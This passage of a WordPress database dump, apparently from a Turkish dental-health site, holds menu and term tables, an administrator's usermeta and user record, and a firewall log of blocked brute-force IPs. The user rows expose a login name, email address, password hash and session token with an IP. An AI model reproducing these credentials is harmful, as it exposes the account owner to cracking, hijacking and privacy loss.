ex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]}}]', '\"\"');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_revslider_static_slides`
--

CREATE TABLE `zdenl_revslider_static_slides` (
  `id` int(9) NOT NULL,
  `slider_id` int(9) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_termmeta`
--

CREATE TABLE `zdenl_termmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_terms`
--

CREATE TABLE `zdenl_terms` (
  `term_id` bigint(20) UNSIGNED NOT NULL,
  `name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Tablo döküm verisi `zdenl_terms`
--

INSERT INTO `zdenl_terms` (`term_id`, `name`, `slug`, `term_group`) VALUES
(1, 'Ağız ve Diş Sağlığı', 'agiz-ve-dis-sagligi', 0),
(22, 'About Menu', 'about-menu', 0),
(23, 'Footer Menu', 'footer-menu', 0),
(24, 'Header Menu', 'header-menu', 0),
(25, 'Video', 'post-format-video', 0);

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_term_relationships`
--

CREATE TABLE `zdenl_term_relationships` (
  `object_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Tablo döküm verisi `zdenl_term_relationships`
--

INSERT INTO `zdenl_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES
(5796, 22, 0),
(5797, 22, 0),
(5798, 22, 0),
(5799, 22, 0),
(6124, 24, 0),
(6125, 24, 0),
(6137, 24, 0),
(6138, 23, 0),
(6139, 23, 0),
(6156, 24, 0),
(6188, 24, 0),
(6247, 1, 0),
(6250, 1, 0),
(6254, 1, 0),
(6257, 1, 0),
(6260, 1, 0),
(6263, 1, 0),
(6266, 1, 0),
(6269, 1, 0),
(6272, 1, 0),
(6275, 1, 0),
(6279, 1, 0),
(6282, 1, 0),
(6285, 1, 0),
(6297, 24, 0),
(6318, 24, 0),
(6319, 24, 0),
(6320, 24, 0),
(6321, 24, 0),
(6347, 24, 0),
(6348, 24, 0),
(6349, 24, 0),
(6350, 24, 0),
(6351, 24, 0),
(6352, 24, 0),
(6358, 24, 0),
(6371, 24, 0),
(6372, 24, 0),
(6386, 24, 0),
(6387, 24, 0),
(6388, 24, 0),
(6389, 24, 0),
(6393, 24, 0),
(6403, 24, 0),
(6404, 24, 0),
(6405, 24, 0),
(6412, 24, 0),
(6413, 24, 0);

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_term_taxonomy`
--

CREATE TABLE `zdenl_term_taxonomy` (
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Tablo döküm verisi `zdenl_term_taxonomy`
--

INSERT INTO `zdenl_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES
(1, 1, 'category', '', 0, 13),
(22, 22, 'nav_menu', '', 0, 4),
(23, 23, 'nav_menu', '', 0, 2),
(24, 24, 'nav_menu', '', 0, 29),
(25, 25, 'post_format', '', 0, 0);

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_usermeta`
--

CREATE TABLE `zdenl_usermeta` (
  `umeta_id` bigint(20) UNSIGNED NOT NULL,
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Tablo döküm verisi `zdenl_usermeta`
--

INSERT INTO `zdenl_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(1, 1, 'nickname', 'markavinci'),
(2, 1, 'first_name', ''),
(3, 1, 'last_name', ''),
(4, 1, 'description', ''),
(5, 1, 'rich_editing', 'true'),
(6, 1, 'syntax_highlighting', 'true'),
(7, 1, 'comment_shortcuts', 'false'),
(8, 1, 'admin_color', 'fresh'),
(9, 1, 'use_ssl', '0'),
(10, 1, 'show_admin_bar_front', 'true'),
(11, 1, 'locale', ''),
(12, 1, 'zdenl_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'),
(13, 1, 'zdenl_user_level', '10'),
(14, 1, 'dismissed_wp_pointers', 'wp496_privacy,vc_pointers_backend_editor'),
(15, 1, 'show_welcome_panel', '1'),
(16, 1, 'session_tokens', 'a:1:{s:64:\"9876a8a80ad97a3a3fde3e3be5e9353945e0fb00e597d648202c0b244fda671c\";a:4:{s:10:\"expiration\";i:1581514455;s:2:\"ip\";s:14:\"94.122.155.109\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\";s:5:\"login\";i:1581341655;}}'),
(17, 1, 'zdenl_dashboard_quick_press_last_post_id', '6558'),
(18, 1, 'community-events-location', 'a:1:{s:2:\"ip\";s:12:\"94.122.155.0\";}'),
(19, 1, 'Impreza_cpt_in_menu_set', '1'),
(20, 1, 'zdenl_user-settings', 'libraryContent=browse&editor=tinymce&edit_element_vcUIPanelWidth=1323&edit_element_vcUIPanelLeft=238px&edit_element_vcUIPanelTop=144px&hidetb=1'),
(21, 1, 'zdenl_user-settings-time', '1531746849'),
(22, 1, 'nav_menu_recently_edited', '24'),
(23, 1, 'managenav-menuscolumnshidden', 'a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),
(24, 1, 'metaboxhidden_nav-menus', 'a:3:{i:2;s:12:\"add-post_tag\";i:3;s:15:\"add-post_format\";i:4;s:25:\"add-us_portfolio_category\";}'),
(25, 1, 'closedpostboxes_post', 'a:0:{}'),
(26, 1, 'metaboxhidden_post', 'a:9:{i:0;s:9:\"formatdiv\";i:1;s:16:\"tagsdiv-post_tag\";i:2;s:11:\"postexcerpt\";i:3;s:13:\"trackbacksdiv\";i:4;s:10:\"postcustom\";i:5;s:16:\"commentstatusdiv\";i:6;s:7:\"slugdiv\";i:7;s:9:\"authordiv\";i:8;s:21:\"mymetabox_revslider_0\";}'),
(27, 1, 'closedpostboxes_us_portfolio', 'a:0:{}'),
(28, 1, 'metaboxhidden_us_portfolio', 'a:6:{i:0;s:24:\"us_portfolio_categorydiv\";i:1;s:21:\"us_portfolio_settings\";i:2;s:11:\"postexcerpt\";i:3;s:16:\"commentstatusdiv\";i:4;s:7:\"slugdiv\";i:5;s:21:\"mymetabox_revslider_0\";}'),
(29, 1, 'edit_page_per_page', '50'),
(30, 1, 'meta-box-order_dashboard', 'a:4:{s:6:\"normal\";s:38:\"dashboard_right_now,dashboard_activity\";s:4:\"side\";s:21:\"dashboard_quick_press\";s:7:\"column3\";s:17:\"dashboard_primary\";s:7:\"column4\";s:0:\"\";}'),
(31, 1, 'last_login_time', '2020-02-10 16:34:15');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_users`
--

CREATE TABLE `zdenl_users` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Tablo döküm verisi `zdenl_users`
--

INSERT INTO `zdenl_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'markavincim', '$P$BlAyaFx0NB8bTIenjSLNaa8gGEw1lf0', 'markavincim', 'markavincim@gmail.com', '', '2018-07-12 14:15:48', '', 0, 'markavinci');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfblockediplog`
--

CREATE TABLE `zdenl_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `unixday` int(10) UNSIGNED NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfblockediplog`
--

INSERT INTO `zdenl_wfblockediplog` (`IP`, `countryCode`, `blockCount`, `unixday`, `blockType`) VALUES
(0x00000000000000000000ffff03173265, 'US', 1, 18457, 'brute'),
(0x00000000000000000000ffff05bc3e93, 'RU', 44, 18457, 'brute'),
(0x00000000000000000000ffff05bc3e93, 'RU', 50, 18458, 'brute'),
(0x00000000000000000000ffff05bc3e93, 'RU', 13, 18459, 'brute'),
(0x00000000000000000000ffff05bc3e93, 'RU', 13, 18472, 'brute'),
(0x00000000000000000000ffff0d484abb, 'US', 10, 18464, 'waf'),
(0x00000000000000000000ffff0de95719, 'IN', 1, 18457, 'brute'),
(0x00000000000000000000ffff17fb82d6, 'US', 1, 18455, 'brute'),
(0x00000000000000000000ffff17fb82d6, 'US', 2, 18458, 'brute'),
(0x00000000000000000000ffff17fb82d6, 'US', 1, 18459, 'brute'),
(0x00000000000000000000ffff2241753f, 'US', 1, 18452, 'brute'),
(0x00000000000000000000ffff2241753f, 'US', 2, 18455, 'brute'),
(0x00000000000000000000ffff2241c7e4, 'US', 1, 18462, 'brute'),
(0x00000000000000000000ffff2241f717, 'US', 1, 18455, 'brute'),
(0x00000000000000000000ffff2241f717, 'US', 2, 18457, 'brute'),
(0x00000000000000000000ffff2241f717, 'US', 1, 18458, 'brute'),
(0x00000000000000000000ffff2241fea7, 'US', 1, 18457, 'brute'),
(0x00000000000000000000ffff224ca5e3, 'US', 1, 18470, 'brute'),
(0x00000000000000000000ffff224ca5e3, 'US', 2, 18471, 'brute'),
(0x00000000000000000000ffff224e277b, 'US', 2, 18454, 'brute'),
(0x00000000000000000000ffff224e44a1, 'US', 4, 18453, 'brute'),
(0x00000000000000000000ffff225a06c8, 'US', 1, 18466, 'brute'),
(0x00000000000000000000ffff225a06c8, 'US', 1, 18468, 'brute'),
(0x00000000000000000000ffff225a06c8, 'US', 1, 18469, 'brute'),
(0x00000000000000000000ffff225a06c8, 'US', 1, 18470, 'brute'),
(0x00000000000000000000ffff225a7713, 'US', 1, 18452, 'brute'),
(0x00000000000000000000ffff225b437b, 'US', 2, 18463, 'brute'),
(0x00000000000000000000ffff225b437b, 'US', 2, 18464, 'brute'),
(0x00000000000000000000ffff226b76da, 'US', 1, 18467, 'brute'),
(0x00000000000000000000ffff226b76da, 'US', 2, 18468, 'brute'),
(0x00000000000000000000ffff226b76da, 'US', 3, 18469, 'brute'),
(0x00000000000000000000ffff23bd67a0, 'US', 1, 18464, 'brute'),
(0x00000000000000000000ffff23bde3df, 'US', 2, 18461, 'brute'),
(0x00000000000000000000ffff23cc4c4a, '', 1, 18452, 'brute'),
(0x00000000000000000000ffff23e04920, 'US', 1, 18464, 'brute'),
(0x00000000000000000000ffff23e41915, '', 1, 18463, 'brute'),
(0x00000000000000000000ffff23e41915, '', 1, 18465, 'brute'),
(0x00000000000000000000ffff23e41915, '', 1, 18466, 'brute'),
(0x00000000000000000000ffff23e41b57, '', 2, 18453, 'brute'),
(0x00000000000000000000ffff23e41b57, '', 1, 18454, 'brute'),
(0x00000000000000000000ffff23e41b57, '', 2, 18455, 'brute'),
(0x00000000000000000000ffff23e41b57, '', 2, 18456, 'brute'),
(0x00000000000000000000ffff23e41b69, '', 2, 18471, 'brute'),
(0x00000000000000000000ffff23e44751, '', 1, 18464, 'brute'),
(0x00000000000000000000ffff23e44751, '', 1, 18465, 'brute'),
(0x00000000000000000000ffff23e44751, '', 1, 18466, 'brute'),
(0x00000000000000000000ffff23e44751, '', 1, 18467, 'brute'),
(0x00000000000000000000ffff23e48f61, '', 1, 18455, 'brute'),
(0x00000000000000000000ffff23e48f61, '', 4, 18456, 'brute'),
(0x00000000000000000000ffff23e48f61, '', 2, 18457, 'brute'),
(0x00000000000000000000ffff23e48f61, '', 1, 18458, 'brute'),
(0x00000000000000000000ffff23e4b187, '', 1, 18454, 'brute'),
(0x00000000000000000000ffff23e4cc33, '', 1, 18461, 'brute'),
(0x00000000000000000000ffff23e4cc33, '', 1, 18463, 'brute'),
(0x00000000000000000000ffff23e4cc33, '', 1, 18464, 'brute'),
(0x00000000000000000000ffff23e4d6bf, '', 1, 18467, 'brute'),
(0x00000000000000000000ffff23e4d9f0, '', 3, 18458, 'brute'),
(0x00000000000000000000ffff23e4d9f0, '', 2, 18459, 'brute'),
(0x00000000000000000000ffff23e4d9f0, '', 1, 18460, 'brute'),
(0x00000000000000000000ffff23e96983, 'US', 2, 18459, 'brute'),
(0x00000000000000000000ffff23e96983, 'US', 1, 18460, 'brute'),
(0x00000000000000000000ffff23f04289, '', 2, 18467, 'brute'),
(0x00000000000000000000ffff23f04289, '', 1, 18468, 'brute'),
(0x00000000000000000000ffff23f04289, '', 1, 18469, 'brute'),
(0x00000000000000000000ffff253b355d, 'FR', 1, 18452, 'waf'),
(0x00000000000000000000ffff253b386b, 'FR', 1, 18473, 'brute'),
(0x00000000000000000000ffff28459b5b, 'US', 1, 18457, 'brute'),
(0x00000000000000000000ffff2875ea21, 'US', 62, 18461, 'brute'),
(0x00000000000000000000ffff2875ea21, 'US', 15, 18461, 'waf'),
(0x00000000000000000000ffff2e6587bd, 'DE', 1, 18475, 'brute'),
(0x00000000000000000000ffff2e659609, 'DE', 1, 18474, 'brute'),
(0x00000000000000000000ffff2e65a873, 'DE', 1, 18456, 'brute'),
(0x00000000000000000000ffff2e65ecdd, 'DE', 1, 18458, 'brute'),
(0x00000000000000000000ffff2f72971d, 'CN', 1, 18458, 'brute'),
(0x00000000000000000000ffff330f93bd, 'FR', 1, 18469, 'brute'),
(0x00000000000000000000ffff330f9daa, 'FR', 1, 18466, 'brute'),
(0x00000000000000000000ffff334b7b07, 'FR', 1, 18475, 'brute'),
(0x00000000000000000000ffff334b902b, 'DE', 1, 18457, 'brute'),
(0x00000000000000000000ffff334b902b, 'DE', 1, 18458, 'brute'),
(0x00000000000000000000ffff339e1bf2, 'FR', 1, 18476, 'brute'),
(0x00000000000000000000ffff33b23454, 'FR', 1, 18458, 'brute'),
(0x00000000000000000000ffff34e0e9bc, 'US', 1, 18456, 'brute'),
(0x00000000000000000000ffff34e650de, 'SG', 1, 18477, 'waf'),
(0x00000000000000000000ffff34ed4839, 'SG', 1, 18459, 'brute'),
(0x00000000000000000000ffff34f707de, 'US', 9, 18466, 'waf'),
(0x00000000000000000000ffff3625fe0e, 'FR', 1, 18475, 'brute'),
(0x00000000000000000000ffff36457614, 'US', 1, 18456, 'brute'),
(0x00000000000000000000ffff3ed2073b, 'FR', 1, 18468, 'brute'),
(0x00000000000000000000ffff3ed2073b, 'FR', 1, 18469, 'brute'),
(0x00000000000000000000ffff3ed21bb7, 'FR', 1, 18474, 'brute'),
(0x00000000000000000000ffff3ed2b1e0, 'FR', 1, 18460, 'brute'),
(0x00000000000000000000ffff3ed2b2e5, 'FR', 1, 18459, 'brute'),
(0x00000000000000000000ffff3ed2b2e5, 'FR', 1, 18462, 'brute'),
(0x00000000000000000000ffff406f7e2b, 'US', 1, 18458, 'brute'),
(0x00000000000000000000ffff40e300ea, 'US', 1, 18457, 'brute'),
(0x00000000000000000000ffff44b749fe, 'DE', 1, 18458, 'brute'),
(0x00000000000000000000ffff44b792f9, 'US', 1, 18456, 'brute'),
(0x00000000000000000000ffff44b7b807, 'SG', 1, 18458, 'brute'),
(0x00000000000000000000ffff4df7b5a2, 'NL', 1, 18461, 'brute'),
(0x00000000000000000000ffff4f82e3f6, 'GR', 1, 18455, 'brute'),
(0x00000000000000000000ffff505240d4, 'NL', 1, 18477, 'brute'),
(0x00000000000000000000ffff505240d5, 'NL', 1, 18462, 'brute'),
(0x00000000000000000000ffff505244ca, 'NL', 1, 18453, 'waf'),
(0x00000000000000000000ffff51aaef02, 'SE', 1, 18476, 'brute'),
(0x00000000000000000000ffff52a576f9, 'DE', 1, 18465, 'waf'),
(0x00000000000000000000ffff52a576f9, 'DE', 1, 18469, 'waf'),
(0x00000000000000000000ffff592327b4, 'RO', 1, 18455, 'brute'),
(0x00000000000000000000ffff592327b4, 'RO', 10, 18456, 'brute'),
(0x00000000000000000000ffff592327b4, 'RO', 6, 18457, 'brute'),
(0x00000000000000000000ffff5b7959bd, 'FR', 1, 18475, 'brute'),
(0x00000000000000000000ffff5b7996e5, 'FR', 1, 18481, 'waf'),
(0x00000000000000000000ffff5b86f8e6, 'FR', 1, 18458, 'brute'),
(0x00000000000000000000ffff5e17d8a7, 'FR', 1, 18476, 'waf'),
(0x00000000000000000000ffff5e17d8a7, 'FR', 1, 18482, 'waf'),
(0x00000000000000000000ffff5e17de93, 'FR', 1, 18459, 'brute'),
(0x00000000000000000000ffff67d8b013, 'IN', 1, 18455, 'brute'),
(0x00000000000000000000ffff6883d077, 'US', 1, 18475, 'brute'),
(0x00000000000000000000ffff689b690d, 'US', 1, 18462, 'brute'),
(0x00000000000000000000ffff689b690d, 'US', 3, 18463, 'brute'),
(0x00000000000000000000ffff689b690d, 'US', 4, 18465, 'brute'),
(0x00000000000000000000ffff68ec2dab, 'US', 1, 18456, 'brute'),
(0x00000000000000000000ffff68ee7d85, 'US', 1, 18457, 'brute'),
(0x00000000000000000000ffff68f816fa, 'DE', 1, 18458, 'brute'),
(0x00000000000000000000ffff6d466419, 'AT', 1, 18456, 'brute'),
(0x00000000000000000000ffff6d466421, 'AT', 1, 18458, 'brute'),
(0x00000000000000000000ffff80c76b21, 'SG', 1, 18475, 'brute'),
(0x00000000000000000000ffff80c79eb6, 'SG', 1, 18459, 'brute'),
(0x00000000000000000000ffff80c7f9d5, 'SG', 1, 18474, 'brute'),
(0x00000000000000000000ffff81cc599f, 'CN', 1, 18458, 'brute'),
(0x00000000000000000000ffff84941c14, 'US', 1, 18459, 'brute'),
(0x00000000000000000000ffff867a1d2e, 'US', 1, 18456, 'brute'),
(0x00000000000000000000ffff867a784a, 'US', 1, 18458, 'brute'),
(0x00000000000000000000ffff86d19756, 'IN', 1, 18476, 'brute'),
(0x00000000000000000000ffff8a443435, 'US', 1, 18458, 'brute'),
(0x00000000000000000000ffff8ac5ab42, 'CA', 1, 18475, 'brute'),
(0x00000000000000000000ffff8ac5ab42, 'CA', 1, 18476, 'brute'),
(0x00000000000000000000ffff8b3b42cf, 'IN', 1, 18457, 'brute'),
(0x00000000000000000000ffff8b3b52a3, 'IN', 1, 18455, 'brute'),
(0x00000000000000000000ffff8b3b8840, 'DE', 1, 18455, 'brute'),
(0x00000000000000000000ffff8b639404, 'AU', 1, 18457, 'brute'),
(0x00000000000000000000ffff90d953e1, 'CA', 1, 18456, 'brute'),
(0x00000000000000000000ffff94428794, 'SG', 1, 18456, 'brute'),
(0x00000000000000000000ffff94428794, 'SG', 1, 18459, 'brute'),
(0x00000000000000000000ffff94481f76, 'US', 1, 18476, 'brute'),
(0x00000000000000000000ffff96810818, 'NL', 1, 18461, 'brute'),
(0x00000000000000000000ffff96810820, 'NL', 1, 18464, 'brute'),
(0x00000000000000000000ffff9df5284c, 'GB', 1, 18459, 'brute'),
(0x00000000000000000000ffff9df5854e, 'US', 1, 18476, 'brute'),
(0x00000000000000000000ffff9f41dbfa, 'US', 1, 18455, 'brute'),
(0x00000000000000000000ffff9f593294, 'US', 1, 18458, 'brute'),
(0x00000000000000000000ffff9f59edeb, 'US', 1, 18457, 'brute'),
(0x00000000000000000000ffffa17537b0, 'SG', 1, 18457, 'brute'),
(0x00000000000000000000ffffa2f74ac8, 'US', 1, 18452, 'brute'),
(0x00000000000000000000ffffa3accfe0, 'FR', 2, 18477, 'brute'),
(0x00000000000000000000ffffa5166703, 'SG', 1, 18457, 'brute'),
(0x00000000000000000000ffffab19c119, 'SE', 1, 18463, 'brute'),
(0x00000000000000000000ffffadec9d55, 'US', 1, 18475, 'brute'),
(0x00000000000000000000ffffadecc522, 'US', 2, 18456, 'waf'),
(0x00000000000000000000ffffadece073, 'US', 1, 18475, 'brute'),
(0x00000000000000000000ffffb00a68f0, 'CH', 1, 18471, 'brute'),
(0x00000000000000000000ffffb2207bcc, 'FR', 1, 18484, 'brute'),
(0x00000000000000000000ffffb2805294, 'SG', 1, 18459, 'brute'),
(0x00000000000000000000ffffb29f2586, 'UA', 103, 18471, 'waf'),
(0x00000000000000000000ffffb4f4e953, 'ID', 1, 18456, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 1, 18452, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 1, 18454, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 1, 18456, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 1, 18457, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 1, 18463, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 1, 18468, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 2, 18473, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 1, 18477, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 2, 18481, 'brute'),
(0x00000000000000000000ffffb955be84, 'TR', 1, 18483, 'brute'),
(0x00000000000000000000ffffb955bfc4, 'TR', 1, 18454, 'brute'),
(0x00000000000000000000ffffb955bfc4, 'TR', 1, 18456, 'brute'),
(0x00000000000000000000ffffb955bfc4, 'TR', 1, 18462, 'brute'),
(0x00000000000000000000ffffb955bfc4, 'TR', 1, 18467, 'brute'),
(0x00000000000000000000ffffb955bfc4, 'TR', 1, 18469, 'brute'),
(0x00000000000000000000ffffb955bfc4, 'TR', 2, 18478, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 1, 18453, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 2, 18457, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 1, 18464, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 1, 18466, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 1, 18467, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 1, 18469, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 1, 18471, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 1, 18478, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 1, 18481, 'brute'),
(0x00000000000000000000ffffb955bfc9, 'TR', 1, 18483, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18453, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18454, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18455, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18456, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18458, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18459, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18464, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18468, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18470, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18471, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18472, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18474, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18476, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18477, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 1, 18480, 'brute'),
(0x00000000000000000000ffffb955eef4, 'TR', 2, 18481, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18453, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18458, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18461, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18462, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18464, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18469, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18470, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18471, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18475, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18476, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18477, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18478, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 2, 18481, 'brute'),
(0x00000000000000000000ffffb955ef6e, 'TR', 1, 18483, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 2, 18452, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 2, 18454, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18457, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18458, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18459, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18462, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18465, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18470, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18472, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18475, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18476, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18480, 'brute'),
(0x00000000000000000000ffffb955efc3, 'TR', 1, 18482, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18453, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 2, 18454, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18456, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18459, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 2, 18461, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18465, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18467, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18470, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18471, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18472, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18473, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 2, 18474, 'brute'),
(0x00000000000000000000ffffb9560dd5, 'TR', 1, 18480, 'brute'),
(0x00000000000000000000ffffb956a462, 'TR', 1, 18452, 'brute'),
(0x00000000000000000000ffffb956a462, 'TR', 1, 18463, 'brute'),
(0x00000000000000000000ffffb956a462, 'TR', 1, 18466, 'brute'),
(0x00000000000000000000ffffb956a462, 'TR', 1, 18468, 'brute'),
